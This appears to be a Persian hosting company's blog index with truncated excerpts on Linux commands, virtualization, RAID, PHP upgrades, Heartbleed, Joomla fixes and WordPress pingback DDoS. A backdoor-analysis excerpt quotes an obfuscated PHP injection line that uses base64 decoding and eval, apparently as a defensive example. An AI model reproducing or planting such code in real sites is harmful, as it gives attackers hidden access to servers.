آشنایی با دستور apropos‎

آشنایی با دستور apropos‎

گاهی ممکن است، شکل یک دستور را ندانیم و نیاز به یک راهنمای مختصر و مفید داشته باشیم تا راهنمایی درباره دستور مورد نظر بدست آوریم. در این مواقع با دانستن کلمه(ها) کلیدی و استفاده از دستور apropos راهنمایی کاملی می‌توان بدست آورد. از دستور apropos برای جست‌وجوی اطلاعات در مورد یک دستور خاص  و یا نمایش لیست کامل دستوراتی که با یک کلمه یا چند حرف شروع  می‌شوند استفاده می‌شود. در واقع این دستور، پایگاه داده راهنماها (man pages) را بر اساس کلمه‌ای که بعنوان آرگومان به آن می‌دهیم، جستجو می‌کند و بر اساس آرگومان ورودی، خروجی‌های مطابق آن کلمه را نمایش می‌دهد. به عنوان مثال  به‌دنبال دستوری برای ویرایش یک فایل هستیم، ابتدا دستور زیر را در محیط ترمینال وارد می‌کنیم: apropos editor پس از اجرای دستور فوق، apropos کلمه کلیدی (در اینجا editor  می‌باشد) را در لیست راهنماها جستجو می‌کند و دستوراتی به‌همراه توضیح خلاصه‌ای از آن‌را به ما پیشنهاد می‌دهد که در راهنمای آن‌ها کلمه کلیدی ‌وجود داشته‌باشد. نتیجه اجرای دستور بالا، لیستی مشابه زیر خواهد بود: ed (1) – text editor ed [red] (1) – text editor ex (1p) – text editor nano (1) – Nano’s ANOther editor, an enhanced free Pico clone psed (1) – a stream editor psed [s2p] […]

نسل سوم مجازی‌سازی

نسل سوم مجازی‌سازی

در روزهای ابتدایی شکل گیری مجازی‌سازی، مجازی سازها به صورت نرم‌افزاری پیاده سازی می‌شدند. به‌عبارتی نرم‌افزارها دستورالعمل‌ها را به صورت نرم‌افزاری شبیه‌سازی می‌کردند. در مجازی‌سازهای نرم‌افزاری سرعت اجرای ماشین‌ها به دلیل سربار فراوانی که وجود داشته بسیار پایین بود. VMWare از اولین مجازی‌سازهای نرم‌افزاری بود. نسل اول مجازی‌سازهای سخت‌افزاری با استفاده از اکستنشن VT-x و یا AMD-V پیاده سازی شد. این اکستنشن دستورات ماشین‌های مجازی را به صورت سخت‌افزاری اجرا می‌کردند در نتیجه سرعت اجرای ماشین‌ها افزایش یافت. با وجود افزایش سرعت مدیریت حافظه و I/O هنوز مشکلی حل نشده بود. Xen از جمله اولین مجازی‌سازهایی بود که با استفاده از paravirtualization و با تغییر در (کدهای) ماشین مجازی تلاش کرد مشکل مدیریت حافظه و I/O را حل کند. نسل سوم مجازی‌سازهای سخت‌افزاری که با نام Second Level Address Translation و یا SLAT شناخته می‌شود، این نسل با استفاده از اکستنشن NPT/EPT کار می‌کند و تلاش کرده‌است تا مشکل مدیریت حافظه را حل کند. از آنجا که در این روش مدیریت حافظه به صورت شفاف و در پایین‌ترین لایه سخت افزاری انجام می‌شود هزینه کاهش پیدا می‌کند. تا قبل از ساخت NPT/EPT ماشین‌های مجازی مدیریت حافظه یا MMU را به صورت نرم‌افزاری مدیریت می‌کردند. برای درک بهتر موضوع باید با […]

آموزش تغییر Mirror در CentOS

ایران‌سرور میرور سنت‌اواس

مدتی پیش خبر رسمی شدن Mirror (میرور) ایران‌سرور را اعلام کردیم، امروز مفتخریم که علاوه بر میرور رسمی سیستم‌عامل ابونتو و کنترل‌پنل دایرکت‌ادمین میرور سیستم‌عامل CentOS (سنت‌او‌اس)‌ نیز هستیم. متاسفانه با وجود تلاش‌های بی‌وقفه برای رسمی شدن این میرور و به‌دلیل مشکلات ناشی از تحریم، شرکت سنت‌او‌اس از قبول ایران‌سرور به عنوان میرور رسمی خود سرباز زد. بنابراین استفاده از آن برخلاف دو میرور قبل خودکار نیست و کاربر جهت دسترسی باید به‌صورت دستی تنظیمات زیر را انجام دهد. آموزش تغییر میرور پیش‌فرض سیستم‌عامل سنت‌اواس: ابتدا با استفاده از دستور زیر فایل مربوط به لیست میرورهای سیستم‌عامل را باز کنید: nano /etc/yum.repos.d/CentOS-Base.repo در فایل باز شده، ابتدای تمامی گزینه‌های mirrorlist= یک سمبل شارپ (#) قرار دهید و سمبل # ابتدای #baseurl= را حذف کنید. پس از آن مقدار mirror.iranserver.com را جایگزین mirror.centos.org کنید. در انتها تغییرات اعمال شده در فایل CentOS-Base.repo را ذخیره نمایید. فیلم آموزش تغییر میرور پیش‌فرض سیستم‌عامل سنت‌او‌اس: مزایایی استفاده از میرور ایران‌سرور: ۱- بروز رسانی هر ۶ ساعت یک‌بار میرور. ۲_ اتصال با حد اکثر سرعت و دانلود سریع برای کاربران ایران. ۳_ عدم وجود مشکلات فیلترینگ میرورها. ۴_ اتصال و دانلود با  سرعت ۱۰۰ مگابیت در دیتاسنتر پارس‌آنلاین، شاتل، آسیا تک و افرانت. ۵- استفاده از پهنای باند داخلی‌، در نتیجه صرفه‌جویی در […]

حفره‌ی امنیتی مهم OAuth2 و ماژول OpenID مشابه با heartbleed

OAuth 2.0 and OpenID Bug

هنوز زمان زیادی از  مشکل امنیتی موجود در openssl –خونریزی قلبی– نمی‌گذرد و همچنان کاربران در حال بروز رسانی و رفع مشکلات ایجاد شده توسط این حفره هستند که شاهد بروز مشکل امنیتی دیگری بر روی پروتکل OAuth2 و ماژول OpenID هستیم. پروتکل OAuth در سایت‌هایی نظیر گوگل، فیس‌بوک، لینکداین، یاهو، و بسیاری از سایت‌های بزرگ دیگر استفاده شده‌است. لیست سایت‌هایی که از پروتکل OAuth استفاده می‌کنند را می‌توانید از لینک http://en.wikipedia.org/wiki/OAuth مشاهده نمایید. پروتکل OAuth: پروتکلی است که برای متصل کردن ۲ یا جند حساب کاربری در سایت‌های مختلف استفاده می‌شود. به‌عنوان مثال می‌توانید از سایتی مانند Linkedin.com بدون ساخت حساب کاربری، به‌وسیله‌ی حساب‌ کاربری سایر سایت‌ها مانند فیس‌بوک، گوگل و توئیتر که از OAuth2 و ماژول OpenID استفاده می‌کنند، استفاده نمایید. در این حالت ابتدا شما به سایتی که در آن حساب کاربری دارید Log in و پس از تعیین اعتبار به سایت لینکداین متصل خواهید شد. حفره‌ی امنیتی جدیدی به نفوذگران امکان می‌دهد که با استفاده از تکنیک‌های phishing در زمان درخواست نام کاربری و رمز عبور، اطلاعات کاربری شما را سرقت و از آن سوء استفاده نمایند. برای جلوگیری از سرقت اطلاعات و با توجه به عدم ارائه راه‌حل معتبر تا کنون، توصیه ما به شما این است که تا اطلاع ثانوی و رفع مشکل امنیتی از OpenID جهت […]

آموزش نصب KVM و ساخت ماشین مجازی در ابونتو

آموزش نصب KVM و ساخت ماشین مجازی در ابونتو

اگر از لینوکس استفاده می‌کنید، نیازی به استفاده از نرم‌افزار VMware یا VirtualBox برای ساخت ماشین مجازی (VM)‌ نیست. می‌توان از KVM (تعبیه شده در هسته‌ لینوکس) برای اجرای سیستم‌عامل ویندوز و یا لینوکس بر روی ماشین‌مجازی استفده کرد. جهت اجراری دستورات می‌توانید از ابزارهای command-line (خط دستور) و یا برای سادگی بیشتر از سیسنم‌های گرافیکی مدیریت VM مانند libvirt و Virt-Manager استفاده نمایید. Virt-Manager نسبت به سایر نرم‌افزارهای این دسته از محبوبیت بالایی در بین کاربران برخوردار است.  نصب KVM: KVM تنها بر روی CPUای کار می‌کند که سخت‌افزار مجازی‌ساز مانند Intel VT-x یا  AMD-V را پشتیبانی ‌کند. برای بررسی امکان پشتیبانی CPU کافیست دستور زیر را اجرا نمایید: egrep -c ‘(svm|vmx)’ /proc/cpuinfo چناچه نتیجه حاصل از اجرای دستور فوق ۰ باشد، CPU شما از سخت‌افزار مجازی ساز پشتیبانی ‌نمی‌کند، اما اگر حاصل رقم ۱ یا بالاترباشدبه معنی پشتیبانی CPU از سخت‌افزار مجازی‌ساز است. دقت کنید که برای استفاده از پشتیبانی سخت‌افزاری مجازی‌سازی در CPU، تنها تست وجود آن کافی نیست، بلکه باید در BIOS سیستم نیز فعال باشد. از دستور زیر برای نصب KVM و پکیج‌های پشتیبانی آن می‌توانید استفاده کنید. sudo apt-get install qemu-kvm libvirt-bin bridge-utils virt-manager تنها کاربر Root و کاربرهای گروه libvirtd مجوز دسترسی به KVM برای اجرای دستورات مدیریت ماشین مجازی را دارند. با اجرای دستور زیر می‌توانید یک کاربر خاص […]

٪۵۰ تخفیف ویژه فروش هاست به مناسبت ۱۲امین سال تأسیس ایران‌سرور

۵۰٪ تخفیف ویژه فروش هاست به مناسبت ۱۲امین سال تأسیس ایران‌سرور

ایران‌سرور بیش از یک دهه است که فعالیتش را در صنعت هاستینگ آغاز کرده و به پشتوانه کاربران عزیز توانسته است جایگاه خوبی را در بین شرکت‌های ارائه دهنده خدمات میزبانی وب بدست آورد. در آستانه فرارسیدن دوازده‌امین سال تأسیس شرکت ایران‌سرور قرار داریم و تلاشمان بر آن است که در سال جاری با فراهم کردن شرایط بهتر و سرویس‌های با کیفت‌تر و متنوع‌تر، رضایت هر چه بیشتر شما عزیزان را جلب نماییم. به بهانه تولد ایران‌سرور تصمیم داریم سرویس‌های هاست خود را به مدت یک هفته با تخفیف ۵۰% ارائه دهیم. همچنین اعضای باشگاه مشتریان ایران‌سرور، به پاس همراهی شان، می‌توانند علاوه بر استفاده از تخفیف فوق، با تمدید پیش از موعد یک ساله سرویس هاست از ۳۰ درصد تخفیف و تمدید ۶ ماهه سرور مجازی و اختصاصی از ۱۵ درصد تخفیف در هفته جاری بهره مند شوند. برای این استفاده از تخفیف‌های فوق، با بخش فروش تماس حاصل فرمایید. ساعت کاری بخش فـــروش ایران سرور: از ساعت ۸ الی ۱۵ شماره تماس : ۷۶۷۳۶۰۰-۰۵۱۱ (۴ خط)

توابع PHP Callback راه جدید مخفی کردن Backdoorها

توابع PHP Callback راه جدید مخفی کردن Backdoorها

امروزه هکرها و نویسندگان بدافزارها به‌دنبال روش‌های نوین و پیچیده‌ای برای مخفی کردن کدهای مخرب خود هستند. یکی از روش‌هایی که در سال‌های اخیر محبوبیت زیادی پیدا کرده، استفاده از توابع callback در زبان‌هایی مانند PHP است. توابع callback به‌طور معمول به‌عنوان ابزاری برای مدیریت رویدادها و کاهش پیچیدگی برنامه‌نویسی استفاده می‌شوند، اما هنگامی که در دستان نادرستی قرار گیرند، می‌توانند به ابزار مناسبی برای پنهان کردن backdoorها تبدیل شوند. در زمینه‌ی امنیت سایبری، Backdoor یا درب پشتی به کدی گفته می‌شود که به‌طور مخفیانه در سیستم یا نرم‌افزاری قرار می‌گیرد تا به فرد مهاجم دسترسی غیرمجاز به سیستم بدهد. این دسترسی معمولاً بدون اطلاع یا رضایت کاربر اصلی است و هکر را قادر می‌سازد تا به داده‌ها یا منابع سیستم دسترسی پیدا کند، کدهای دیگری اجرا کند یا حتی کنترل کامل سیستم را در دست بگیرد. در این مقاله قصد داریم به بررسی مفهوم callback و چگونگی استفاده از آن در پنهان کردن بدافزارها بپردازیم. Callback چیست؟ به طور کلی، Callback به معنای فراخوانی به عقب است. در برنامه‌نویسی، توابع callback توابعی هستند که به‌عنوان آرگومان به توابع دیگر پاس داده می‌شوند و سپس در زمان مشخصی توسط تابع دریافت‌کننده اجرا می‌گردند. این تکنیک به برنامه‌نویسان اجازه می‌دهد تا […]

آیا با وجود حل مشکل Heartbleed باید رمزها را تغییر داد؟

آیا با وجود حل مشکل Heartbleed باید رمزها را تغییر داد؟

با توجه به حفره امنیتی SSL به نام  Heartbleed که این روزهای جنجال‌های بسیار زیاد و نگرانی‌های قابل درک کاربران را به همراه داشته‌است، توصیه ما به شما تغییر رمزهای عبور خود در اولین فرصت ممکن می‌باشد. گوگل اعلام کرده است که کاربران نیازی به تغییر پسورد خود ندارند، اما برای امنیت بیشتر بهتر است این کار را انجام دهید. خصوصا با توجه به بررسی وب‌سایت Mashable مبنی بر وضعیت امنیتی برخی سایت‌های معروف و وضعیت آن‌ها در مورد این حفره، بهتر است رمزعبور سایت‌هایی را در لیست زیر ذکر شده است تغییر دهید. برای مشاهده لیست کامل می‌توانید به  وب‌سایت Mashable مراجعه نمایید. شبکه‌های اجتماعی: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ مشکل امنیتی برطرف شده‌است؟ پسورد را تغییر دهیم؟ فیس‌بوک – Facebook بلی بلی بلی تویتر – Twitter بلی بلی نامشخص اینستاگرام – Instagram بلی بلی بلی لینکداین – LinkedIn خیر خیر خیر پینترست – Pinterest بلی بلی بلی تامبلر – Tumbler بلی بلی بلی شرکت‌های بزرگ: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ مشکل امنیتی برطرف شده‌است؟ پسورد را تغییر دهیم؟ گوگل – Google بلی بلی بلی مایکروسافت – Microsoft خیر خیر خیر یاهو – Yahoo بلی بلی بلی اپل – Apple خیر خیر خیر آمازون – Amazon خیر خیر خیر ایمیل: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ […]

ایران‌سرور اولین Mirror رسمی Ubuntu و DirectAdmin در ایران

ایران‌سرور میرور رسمی دایرکت‌ادمین و اوبونتو

در هفته‌ای که گذشت ایران‌سرور  اولین Mirror (میرور) رسمی Ubuntu (اوبونتو) و DA (دایرکت‌ادمین) را در ایران راه اندازی نمود. Mirror رسمی چیست؟ Mirror مخزنی است که برنامه‌ها و آپدیت‌های توزیع‌های لینوکس مانند اوبونتو و CentOS (سنت‌اواس)، را برای دسترسی و دانلود توسط کاربران نگه‌داری می‌کند، با توجه به اینکه روزانه میزان دانلود زیادی از Mirrorها انجام میشود، برای تسریع در سرعت دانلود و بالاتر بردن سرعت دانلود برای کاربران در نقاط مختلف جهان، Mirrorها بصورت توزیع شده عمل میکنند، بدین معنی که کاربران بصورت خودکار و بدون آنکه متوجه شوند، به نزدیکترین و سریعترین Mirror به خود متصل شده و فایل‌ها را از آن دانلود می‌کنند. مزایای Mirror رسمی ایران‌سرور: اکنون تمام کاربران ایرانی که از سیستم عامل Ubuntu نسخه‌های مختلف، استفاده میکنند بصورت خودکار نرم افزارهای جدید و بروزرسانی‌های سیستم عامل خود را از Mirror ایران‌سرور دریافت مینمایند، با توجه به اینکه سرور میرور ایران‌سرور در بستر شبکه ایران قرار دارد، دسترسی کاربران داخل ایران تا ۴برابر سریع‌تر از قبل خواهد بود. تمام کاربران ایرانی که از کنترل پنل Directadmin استفاده میکنند، در هنگام نصب کنترل پنل بصورت خودکار، اطلاعات را از سرور ایران‌سرور دریافت خواهند نمود و سرعت دانلود اطلاعات در هنگام نصب و بروزرسانی Directadmin بسیار سریعتر […]

حفره امنیتی SSL Heartbleed و راه مقابله با آن

حفره امنیتی SSL Heartbleed و راه مقابله با آن

دیروز Bug (حفره) امنیتی جدیدی در هسته کتابخانه‌های مورد نیاز SSL  منتشر شده‌است که باعث می‌شود تا اطلاعات ذخیره شده در Memory سرویس دهنده و سرویس گیرنده با حجم۶۴ کیلوبایت و یا بیشتر فاش شود. اطلاعاتی که در Memory سرویس دهنده و گیرنده ذخیره می‌شوند عبارتند از:     ۱- Primary key     ۲- Secondary key     ۳- Protected content     ۴- Collateral     ۱- primary key: اطلاعات موجود در Primary key عبارتند از: «کلید محرمانه SSL» که دسترسی به این کلید به نفوذگر امکان رمز گشایی ترافیک‌های گذشته و آینده ارسالی به سمت سرویس گیرنده را میدهد.     ۲- secondary key: اطلاعات ذخیره شده در Secondary key عبارتند از: «اطلاعات مربوطه به اعتبارسنجی‌ها»، می‌توان نام‌های کاربری و رمزهای عبور را در این دست اطلاعات قرار داد.     ۳- Protected content‌: اطلاعات موجود در Protected content عبارتند از: «محتوای ایمیل‌ها، عکس‌ها و مطالب تبادل شده بین سرویس گیرنده و سرویس دهنده»، در حالت عادی فقط مالک ایمیل می‌تواند به این اطلاعات دسترسی داشته باشد.     ۴- Collateral: اطلاعات ذخیره شده در Collateral عبارتند از: «اطلاعات مربوط به Memory» که می‌توان جزییات فنی نظیر آدرس حافظه، مکانیزم‌های امنیتی جهت جلوگیری از حملات buffer overflow (حملات سریز حافظه) و غیره […]

چه Loaderهایی از PHP 5.4 پشتیبانی می‌کند

چه Loaderهایی از PHP 5.4 پشتبانی می‌کند

با توجه به اینکه در باره ارائه PHP 5.4 و فواید ارتقا به PHP 5.4 صحبت نمودیم، در این مقاله قصد داریم Loaderهایی که از PHP 5.4 پشتیبانی می‌کنند را معرفی کنیم. ۱. Zend Guard Loader: شرکت Zend Technologies برای نسخه ‫PHP 5.3 لودر معروف خود به نام Zend Optimizer را ارائه نداد، بلکه برای نسخه‌های  ‫PHP 5.2 به بعد لودر جدیدی با نام Zend Guard معرفی نمود. بنا به گزارش Zend Technologies این دو لودر جز نسخه PHP تفاوت دیگری با هم ندارند، همچنین این شرکت به کسانی که با Zend Optimizer مشکل دارند گفته‌است باید اسکریپت خود را به PHP 5.3 و لودر Zend Guard بروزرسانی کنند. Loaderهای Zend Technologies و نسخه‌های هماهنگ PHP با آن:     * Zend Guard loader برای نسخه‌های ۵.۳ تا PHP 5.4         فایل‌های که با Zend Guard در نسخه‌های PHP 5.2 و PHP 5.3  کد شده‌اند در صورت ارتقاء نسخه PHP به PHP 5.4 دیگر قابل اجرا نخواهند بود و باید مجددا فایل‌ها کد گذاری شوند.     * Zend Optimizer loader برای نسخه‌های ۴.۲ تا PHP 5.2        شرکت zend نسخه Zend Guard 6 را آماده کرده‌است، این نسخه PHP 5.3 و PHP 5.4 را پشتبانی می‌کند و در صورت ارتقاء نسخه PHP به نسخه PHP 5.4 باید […]

حملات DDoS از طریق سایت‌های WordPress

حملات DDoS

حملات DDoS امروزه به‌دلیل اهمیت موضوع، بسیار مورد مطالعه و بررسی قرار می‌گیرد. در این مقاله قصد داریم تا درباره حمله‌ای گسترده که توانسته از هزاران سایت WordPress از همه جا بی‌خبر به‌عنوان منبع تکثیر استفاده کند، صحبت کنیم. بیش از ۱۶۲۰۰۰ سایت WordPress برای حملات توزیع شده اختلال در سرویس (DDoS) استفاده می‌شوند. چنانچه قابلیت pingback در سایت WordPress  فعال باشد (به‌صورت پیش فرض غیرفعال است) می‌تواند برای حملات DDoS علیه سایت دیگر استفاده شود. توجه داشته باشید که XMLRP در pingback، Trackbacks، remote access از طریق موبایل و تعدادی ویژگی دیگر که شما احتمالا خیلی به آن‌ها علاقمندید، استفاده شده‌است بنابراین آن‌ها نیز می‌توانند مورد سوء استفاده قرار گیرند. بررسی روال انجام حملات DDoS  به کمک سایت WordPress: حمله DDOS علیه یک سایت WordPress پربازدید توانست آن را برای ساعت‌های طولانی با کندی زیادی مواجه کند، زمانی که این حملات زیاد شد هاست سایت به کلی از سرویس دهی ناتوان و سایت از دسترس خارج شد. برای رفع مشکل صاحبان سایت مجبور شدند که سرور خود را در zone یک فایروال قرار دهند تا بتوانند حملات را مانیتور نمایند. پس از انتقال متوجه یک حمله سیل آسای توزیع شده مبتنی بر HTTP شدند. هزاران request (درخواست) در هر ثانیه به […]

هدایای نوروزی ایران‌سرور

هدایای نوروزی ایران‌سرور

پکیج‌های نوروزی ایران‌سرور به شرح زیر می‌باشد. جهت کسب اطلاعات بیشتر با واحد فروش ایران‌سرور تماس بگیرید. تلفن تماس: ۰۵۱۱۷۶۷۳۶۰۰ داخلی ۲۰۱ و ۲۰۲

سطوح مختلف RAID

تکنیک striping

تا کنون در ارتباط با اینکه RAID چیست؟ و انواع RAID صحبت کردیم، در این مقاله قصد داریم به بررسی سطوح مختلف RAID بپردازیم. RAID  دارای چندین سطح می‌باشد که نوع آن معمولا به وسیله یک عدد مشخص می‌شود. وقتی که صحبت از سطوح RAID می‌شود منظور کیفیت ذخیره اطلاعات نیست، بلکه نحوه ذخیره‌سازی اطلاعات در آرایه‌ای از دیسک‌ها می‌باشد. تا کنون ۹ سطح متفاوت RAID پیاده‌سازی شده‌است که عبارتند از: RAID 0 RAID 1 RAID 2 RAID 3 RAID 4 RAID 5 RAID 6 RAID 10 یا RAID 1+0 RAID 01 یا RAID 0+1 RAID 0: در این سطح، اطلاعات به بلوک‌هایی با اندازه‌های مساوی تقسیم و هر بلوک به یک دیسک منتقل می‌گردد. به عنوان مثال اطلاعات به بلوک‌های A و B  با اندازه‌های مساوی تقسیم و به دیسک‌ها منتقل می‌شوند. این روش اغلب توسط تکنیک striping استفاده می‌گردد و باعث افزایش سرعت خواندن و نوشتن اطلاعات می‌شود. پیش از استفاده توجه داشته باشید، RAID 0 روشی برای مقابله با از دست رفتن اطلاعات نیست. به‌عبارتی در این روش هیچگونه کپی از اطلاعات تهیه نمی‌شود و هنگامی که یکی از دیسک‌ها با مشکل برخورد کند، اطلاعات کاملا از دست خواهد رفت که البته می‌توان با پرداخت هزینه اطلاعات را تا حدودی بازیابی نمود. RAID 1: این نوع RAID […]

ارتقا به PHP 5.4 آری یا خیر

میزان استفاده از نسخه‌های PHP

با توجه به ارائه  PHP 5.4 این سوال مطرح می‌گردد که آیا ارتقا به PHP 5.4 مفید خواهد بود؟ همیشه ارتقا به نسخه‌های جدید توسط تیم توسعه و پشتیبانی زبان‌های برنامه نویسی توصیه می‌گردد، اما این‌بار تیم توسعه PHP بدون توجه به میزان استفاده از نسخه‌های متفاوت PHP، استفاده کنندگان را نسبت به به‌کارگیری نسخه جدید PHP 5.4 تشویق نموده‌است، این تیم اعلام نموده‌ ۵ باگ اساسی در این نسخه برطرف شده‌است که در برگیرنده‌ی CVE-2014-1943 نیز می‌باشد. در ادامه قصد داریم برخی تغییرات PHP 5.4 را نسبت به نسخه‌های پیشین بررسی کنیم. سرعت در PHP 5.4: سرعت اجرای کدها در PHP 5.4 نسبت به نسخه ۵.۳ آن تقریبا ۲ برابر شده‌است. دوبرابر شدن سرعت اجرای کد، بهینه‌سازی بالای قواعد زبان برنامه نویسی را می‌طلبد. برای آزمایش این موضوع کافی است یک آزمایش ساده انجام داد. قطعه کد ساده زیر را در در شرایط مساوی سخت‌افزاری و نرم‌افزاری بر روی یک سیستم با هر دو ورژن اجرا کردیم. $r = 10 * 1000 * 1000; $start = microtime(true); while($r– > 0) { new StdClass(); } $finish = microtime(true); echo “time taken: ” . ($finish – $start) . “\n”; نتیجه باورنکردنی بود، در نمودار زیر شما می‌توانید تفاوت زمان اجرای کد را در در ورژن ۵.۴ و […]

پیش به سوی PHP 5.4

ارتقاء PHP

اگر تازه می‌خواهید وارد دنیای وب شوید بهتر است از سرورهایی با نسخه پایدار ۵.۴ PHP بهره ببرید. اما کاربرانی نیز وجود دارند که در حال حاضر با ورژن‌های قدیمی PHP در حال کار هستند و می‌خواهند به سرورهایی با PHP ورژن ۵.۴ مهاجرت کنند، یا مدیران آن‌ها قصد ارتقاء ورژن PHP را دارند. راهکارهای ارتقاء PHP: با ارتقا ورژن PHP سرورهای وب مطمئنا امنیت و کارایی سرور بالاتر خواهد رفت اما مشکلات و مسائلی را برای برنامه نویسان و وب‌سایت‌ها به وجود خواهد آورد. اغلب این مشکلات به کابرانی مربوط می‌شود که از یک سیستم مدیریت محتوا (CMS) مانند وردپرس، جوملا یا دروپال به دور از دغدغه‌های برنامه نویسی استفاده می‌کنند. لود نشدن سایت، نمایش صفحه سفید، سایت همراه با اخطارها و خطوط خطای مختلف از جمله مشکلاتی هستند که برای این دسته از کاربران هنگام ارتقاء ورژن PHP به ۵.۴ پیش می‌آید. عوامل ایجاد این مشکلات را می‌توان به سه دسته تقسیم کرد:      ۱. نسخه سیستم مدیریت محتوای شما با PHP 5.4 همخوانی -سازگاری- ندارد.     ۲. قالب CMS شما که با زبان‌های PHP، HTML و CSS نوشته شده‌است با PHP 5.4 سازگاری ندارد.     ۳. پلاگین و اکستنشن‌های مورد استفاده در وب‌سایت کنونی با PHP نسخه ۵.۴ همخوانی ندارد […]

بروزرسانی‌های امنیتی Joomla

بروزرسانی‌های امنیتی Joomla

تیم امنیتی جوملا  به تازگی ۲ نسخه بروز رسانی امنیتی برای نسخه‌های ۲.۵.۱۹ و ۳.۲.۳ ارائه کرده‌است. چنانچه برای پیاده‌سازی وب‌سایت خود از هسته جوملا استفاده کرده‌اید، برای اطمینان داشتن از امنیت سایت خود، حتما در اسرع وقت نسبت به روزرسانی و اعمال این patchها اقدام نمایید. یک تیم ۳۰ نفره متشکل از داوطلبان متخصص جوملا  توانسته‌اند ۴۰ bug (رخنه) را در مدیریت محتوای جوملا ۳.۲.۳ رفع کنند که شامل ۴ رخنه امنیتی نیز بوده‌است.       ۱. با اولویت بالا: آسیب SQL Injection در هسته اصلی جوملای  نسخه ۳.۱.۰ تا ۳.۲.۲.       ۲. با اولویت متوسط: آسیب پذیری XSS در هسته جوملای نسخه ۳.۱.۲ تا ۳.۲.۲.       ۳. با اولویت متوسط: آسیب پذیری XSS در هسته جوملای نسخه ۲.۵.۱۸ به قبل و نسخه ۳.۲.۲ به قبل.       ۴. با اولویت متوسط: آسیب پذیری دسترسی غیرمجاز از طریق احراز هویت Gmail در هسته جوملای نسخه ۲.۵.۱۸  به قبل و نسخه های ۳.۲.۲ به قبل. همانطور که مشاهده میکنید، آسیب‌های SQL Injection و دسترسی غیرمجاز از طریق احراز هویت Gmail (که به صورت پیش فرض غیر فعال می‌باشند) از اولویت بالایی برخوردار هستند. به‌نظر می‌رسد آسیب SQL injection  به دلیل عدم محافظت درست از  id مجموعه وب لینک‌ها و سوء استفاده […]

انواع RAID

انواع Raid

پیش از این در ارتباط با اینکه RAID چیست؟ صحبت کردیم، در این مقاله سعی داریم انواع RAID را از دیگاه پیاده‌سازی بررسی کنیم. به‌طور کلی دو پیکربندی برای RAID  وجود دارد، که عبارتند از RAID  نرم‌افزاری و ‌RAID سخت‌افزاری. ‌RAID سخت‌افزاری یا Hardware RAID:  RAID سخت‌افزاری بیشتر برای سرورهای سازمانی، تجاری و همچنین هنگامی که میزان تحمل خطا و بهینه شدن کارایی سیستم بسیار مورد اهمیت کاربراست، مورد استفاده قرار می‌گیرد. کارایی سیستم در هنگام خواندن و نوشتن اطلاعات با استفاده از کنترلرهای مختلف می‌تواند متفاوت باشد. در این‌RAID سخت‌افزاری از یک کنترلر هوشمند (RAID Controller) و آرایه ای از دیسک‌ها برای از بین نرفتن اطلاعات  و بهبود کارایی خواندن/نوشتن اطلاعات استفاده می‌شود. RAID Controller، وظیفه مدیریت و کنترل دیسک‌های متصل شده به هم را بر عهده دارد. این  کنترلر هوشمند در دو مدل داخلی و خارجی طراحی شده‌است. مدل  داخلی آن در داخل سرور و به برد اصلی سرور متصل می‌شود و مدل دیگر آن که به صورت خارجی است، در RAIDهای سطح و مقیاس بالا به کار می‌رود. بسته به پیکربندی‌های صورت گرفته،RAID  سخت‌افزاری کارایی‌های متفاوتی را فراهم می‌کند. علاوه بر اینکه مدیریت دیسک‌های گوناگون را آسان، این قابلیت را فراهم می‌کند تا کاربر آرایه‌ای از دیسک‌ها را فقط به صورت یک دیسک تنها مشاهده و […]

Backdoorهای پنهان

Backdoorهای پنهان

امروزه دیگر کدهای مخرب پاسخگوی اهداف تولید کننده‌گانشان نیستند، چون به سادگی شناسایی و حذف می‌گردند. کلید موفقیت مهاجمان برای ایجاد بدافزار سودآور؛ در پشتکار و تکرار عملیات تا زمان موفقیت نهفته است. به همین دلیل ما شاهد افزایش نرم‌افزارهای خلاقانه بر مبنای تکنیک‌های Backdoor هستیم. بدافزارهایی که در آن‌ها از روش‌های منحصر به فرد و متدهای مبهم برای افزایش طول عمر حملات استفاده می‌گردد. در ادامه برای معرفی بهتر Backdoor سناریویی که امروز با آن مواجه شدم را شرح خواهم داد: یک نمونه ربات تزریق SPAM می‌تواند تکه کد ساده  ولی حرفه‌ای زیر را به یکی از فایل‌های معتبر جوملا اضافه نماید. $stg=”ba”.”se”.”64_d”.”ecode”;eval ($stg(“JHNlcnZlcl91c2VyX2FnZW50ICAgID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KJHNlcnZlcl9yZWZlcmVyICAgICAgID0gQCRfU0VSVkVSWydIVFRQXJFRkVSRVInXTsNCiRzZXJ2ZXJfZm9yd2FyZGVkX2ZvciA9IEAkX1N…. قطعه کد بالا ترفند جدیدی نیست، از این دسته حملات در نسخه‌های قدیمی سایت‌ساز جوملا بسیار دیده شده‌است‌ و هزاران مطلب در رابطه با آن بر بستر اینترنت وجود دارد. اما این ربات‌ها در اکثر مواقع تنها نیستند و یک همدست برای رسیدن به قصد نهایی خود  دارند؛ همدستی مانند یک پوسته‌ی قدیمی PHP که دسترسی دائمی سرور را به مهاجم خواهد داد. این مطلب نیز جدید نیست.  Crontab Backdoor: پیدا کردن و حذف قطعه کد مخرب فوق بسیار آسان بود، اما سایت در کمتر از ۱۰ دقیقه مجددا آلوده شد!!! با توجه به اینکه، سایت مثال ما از نسخه‌ی قدیمی جوملا استفاده می‌کند، […]

Proliant Gen8،نسل هشتم سرورهای HP

سرورهای HP سری Proliant Gen8

Proliant Gen8 نتیجه ۳۰۰ میلیون دلار هزینه و ۲ سال برنامه ریزی کمپانی HP می‌باشد که با نام Project Voyager مطرح شده‌است. این پروژه از مجموع بیش از ۹۰۰ اختراع به ثبت رسیده انتخاب، و از معماری سیستم جدیدی که به HP ProActive Insight architecture معروف است، حاصل شده است. هدف اصلی طراحی نسل هشتم سرورهای ProLiant، مدیریت آسان، افزایش قابل ملاحظه‌ی سرعت IO و میزان پهنای باند می‌باشد. سرورهای سری Gen8 بسیار هوشمند هستند و تقریبا می‌توانند خودشان را مدیریت کنند. سرورهای Proliant در ۴ دسته زیر ارائه شده‌اند: server blades (BL series) rack-optimized servers (DL series) tower servers (ML series) hyperscale servers (SL series) در تصویر زیر مدل‌هایی که در نسل هشتم، جایگزین نسل قبلی شده‌اند نمایش داده شده‌است. HP در ساخت سرورهای سری Gen8، بر مقوله کارایی بالا و چابکی تمرکز نموده؛ در ادامه برخی از خصوصیات این سری ذکر شده‌است: عملکرد: ۴ برابر کارایی بیشتر در ماشین‌های مجازی، و ۳۸% سریعتر نسبت به مدل های قبل. سرعت وچابکی: ۹ برابر سریعتر در پیکربندی، و 